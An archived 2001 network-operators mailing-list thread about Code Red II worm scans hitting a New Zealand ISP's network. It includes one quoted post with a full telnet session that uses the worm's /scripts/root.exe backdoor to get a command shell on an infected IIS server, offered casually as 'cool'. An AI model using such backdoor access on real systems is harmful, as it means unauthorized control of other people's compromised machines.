Hi all I have looked on our router and am seeing upto 100 attempts per minute from Code Red Vers. II virus scanning our network looking for other machines to infect. Is anyone else seeing such a high scan rate? Can anything be done about it? Over the last 3 hours, the frequency of attempts increased by 50%. At 11:46 PM 05/08/2001 +1200, Chris Wedgwood wrote:
On Sun, Aug 05, 2001 at 11:39:27PM +1200, Perry Lorier wrote:
It's a new worm using the same infection vector. It is a lot more aggressive, and uses the fact that machines near to itself are likely to be good places to find crackable machines. If you have a lot of customers with cracked NT boxes you'll get a lot of scans. If you have a nice C space in the middle of nowhere with no windows machines anywhere near, you might have a rather boring night.
Hey, and it leaves a cool backdoor floating about. Look for recent infectors and telnet to them like such:
cw:0(a)weta(cw)$ telnet x.x.x.x 80 Trying x.x.x.x... Connected to x.x.x.x. Escape character is '^]'. get /scripts/root.exe HTTP/0.9
HTTP/1.1 200 OK Server: Microsoft-IIS/5.0 Date: Sun, 05 Aug 2001 11:39:46 GMT Content-Type: application/octet-stream Microsoft Windows 2000 [Version 5.00.2195] (C) Copyright 1985-1999 Microsoft Corp.
c:\inetpub\scripts>
Cool :)
Start grepping those proxy logs people for lusers attempting to do this (it won't work via a proxy anyhow, but that's no reason not to hunt down the offending luser and beat them senseless).
--cw --------- To unsubscribe from nznog, send email to majordomo(a)list.waikato.ac.nz where the body of your message reads: unsubscribe nznog
Matt Law Network Engineer Voyager NZ Ltd DDI +649 4439 443 PGP Public Key available http://www.voyager.co.nz/~mat/public-key.asc --------- To unsubscribe from nznog, send email to majordomo(a)list.waikato.ac.nz where the body of your message reads: unsubscribe nznog